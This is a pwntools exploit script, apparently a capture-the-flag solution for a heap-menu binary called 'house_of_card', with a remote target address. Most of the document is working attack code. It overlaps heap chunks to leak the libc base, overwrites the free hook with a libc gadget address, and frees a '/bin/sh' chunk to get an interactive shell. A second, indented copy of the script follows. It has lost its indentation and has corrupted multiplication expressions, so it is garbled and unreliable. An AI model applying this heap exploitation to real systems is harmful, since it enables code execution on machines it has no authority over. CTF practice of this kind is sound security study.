hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('./libc.so')
elf = ELF('./house_of_card')
context(os='linux', arch=elf.arch)

RHOST = "178.128.87.12"
RPORT = 31336
LHOST = "127.0.0.1"
LPORT = 31336

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./house_of_card'], gdbscript=gdbscript)
else:
    conn = process(['./house_of_card'])
    # conn = process(['./house_of_card'], env={'LD_PRELOAD': './libc.so'})
    if opt == 'a': gdb.attach(conn)

def add(name, size, desc):
    conn.sendlineafter('4. Quit', '1')
    conn.sendafter('Name :', name)
    conn.sendlineafter('Len?', str(size))
    conn.sendafter('Description:', desc)

def edit(idx, name, size, desc):
    conn.sendlineafter('4. Quit', '2')
    conn.sendlineafter('Back.', str(idx))
    conn.sendafter('name?', name)
    conn.sendlineafter('Len?', str(size))
    conn.send(desc)

def delete(idx):
    conn.sendlineafter('4. Quit', '3')
    conn.sendlineafter('Back.', str(idx))

# exploit
log.info('Pwning')

# overlap chunks for addless leak
add('hogehoge\n', 0x80, 'y'*0x10+'\n')
add('fugafuga\n', 0x80, 'y'*0x10+'\n')
add('piyopiyo\n', 0x80, 'y'*0x10+'\n')
add('bohebohe\n', 0x80, 'y'*0x10+'\n')
edit(1, 'hogehoge'*2+'\n', 0x80+0x80, 'ffffff\n')
edit(1, '/bin/sh\x00\n', 0x80+0x81, 'f'*0xf4 + p64(0xdeadbeef)*4 + p64(0xd0*2+1)+'\n')
delete(2)
add('fugafuga\n', 0xd0-8, 'y'*0x10+'\n')
conn.sendlineafter('4. Quit', '2')
conn.recvuntil('[2] Name : ')
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1c18
dbg('libc_base')
conn.sendline('5')

# overwrite __free_note
add('bohebohe\n', 0x80, 'a'*0x10+'\n')
edit(5, 'bohebohe\n', 0x81, 'a'*0x8c +p64(libc_base+0x3c3788)+'\n')
edit(5, p64(libc_base + 0x456a0) +'\n', 0x80, 'hgoe\n')
delete(1)
conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('./libc.so')
	elf = ELF('./house_of_card')
	context(os='linux', arch=elf.arch)

	RHOST = "178.128.87.12"
	RPORT = 31336
	LHOST = "127.0.0.1"
	LPORT = 31336

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./house_of_card'], gdbscript=gdbscript)
	else:
	conn = process(['./house_of_card'])
	# conn = process(['./house_of_card'], env={'LD_PRELOAD': './libc.so'})
	if opt == 'a': gdb.attach(conn)

	def add(name, size, desc):
	conn.sendlineafter('4. Quit', '1')
	conn.sendafter('Name :', name)
	conn.sendlineafter('Len?', str(size))
	conn.sendafter('Description:', desc)

	def edit(idx, name, size, desc):
	conn.sendlineafter('4. Quit', '2')
	conn.sendlineafter('Back.', str(idx))
	conn.sendafter('name?', name)
	conn.sendlineafter('Len?', str(size))
	conn.send(desc)

	def delete(idx):
	conn.sendlineafter('4. Quit', '3')
	conn.sendlineafter('Back.', str(idx))

	# exploit
	log.info('Pwning')

	# overlap chunks for addless leak
	add('hogehoge\n', 0x80, 'y'*0x10+'\n')
	add('fugafuga\n', 0x80, 'y'*0x10+'\n')
	add('piyopiyo\n', 0x80, 'y'*0x10+'\n')
	add('bohebohe\n', 0x80, 'y'*0x10+'\n')
	edit(1, 'hogehoge'*2+'\n', 0x80+0x80, 'ffffff\n')
	edit(1, '/bin/sh\x00\n', 0x80+0x81, 'f'0xf4 + p64(0xdeadbeef)4 + p64(0xd0*2+1)+'\n')
	delete(2)
	add('fugafuga\n', 0xd0-8, 'y'*0x10+'\n')
	conn.sendlineafter('4. Quit', '2')
	conn.recvuntil('[2] Name : ')
	libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1c18
	dbg('libc_base')
	conn.sendline('5')

	# overwrite __free_note
	add('bohebohe\n', 0x80, 'a'*0x10+'\n')
	edit(5, 'bohebohe\n', 0x81, 'a'*0x8c +p64(libc_base+0x3c3788)+'\n')
	edit(5, p64(libc_base + 0x456a0) +'\n', 0x80, 'hgoe\n')
	delete(1)
	conn.interactive()